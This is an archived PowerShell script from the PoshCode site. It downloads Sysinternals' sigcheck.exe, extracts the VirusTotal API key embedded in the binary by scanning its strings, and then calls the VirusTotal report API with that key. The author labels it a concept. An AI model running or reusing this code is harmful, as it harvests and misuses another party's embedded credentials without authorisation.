PoshCode Archive  Artifact Content

Artifact 74c491e9cc8babfc2fbb594279948af79455fbb102833b658098f5b45cb369aa:

  • File sysinternals-VT-key.ps1 — part of check-in [79a84b0773] at 2018-06-10 14:02:22 on branch trunk — Actually this’s not mine script (you can find original post at https://github.com/gregzakharov/ps/blob/master/ps4/Get-SIVTAPIKey.ps1). It really works! (user: greg zakharov size: 1600)

# encoding: ascii
# api: powershell
# title: sysinternals VT key
# description: Actually this’s not mine script (you can find original post at https://github.com/gregzakharov/ps/blob/master/ps4/Get-SIVTAPIKey.ps1). It really works!
# version: 0.1
# type: function
# author: greg zakharov
# license: CC0
# function: Get-APIKey
# x-poshcode-id: 5835
# x-archived: 2015-04-29T12:27:20
# x-published: 2015-04-26T18:51:00
#
#
#requires -version 4
function Get-APIKey {
  <#
    .SYNOPSIS
        Gets VirusTotal public key of SysInternals.
    .DESCRIPTION
        DO NOT USE IT FOR YOUR DIRTY PURPOSES! THIS SCRIPT IS JUST A CONCEPT.
    .NOTES
        Author: greg zakharov
  #>
  param(
    [Parameter(ValueFromPipeline=$true)]
    [ValidateNotNullOrEmpty()]
    [String]$UserAgent
  )

  $par = @{
    Uri = 'https://live.sysinternals.com/sigcheck.exe'
    DisableKeepAlive = $true
    UseBasicParsing = $true
  }

  if ($UserAgent) { $par['UserAgent'] = $UserAgent }

  ([Regex]'[\x20-\x7E]{64,}').Matches(
    [Text.Encoding]::UTF7.GetString((wget @par).Content)
  ).ForEach({if ($_ -match '\A(\d|[a-z]){64}\Z') {$_.Value}})
}

function Test-APIKey {
  <#
    .SYNOPSIS
        Tests uncovered public key.
    .NOTES
        Author: greg zakharov
  #>
  $par = @{
    Uri = 'https://www.virustotal.com/vtapi/v2/file/report'
    DisableKeepAlive = $true
    Method = 'POST'
    Body = @{
      resource = '0EBD8EA9B29BBA099699ED5A81D6BC4CD7FA46DC220D18FA5289BC3EA5EC1AF8'
      apikey = Get-APIKey
    }
  }

  Invoke-RestMethod @par
}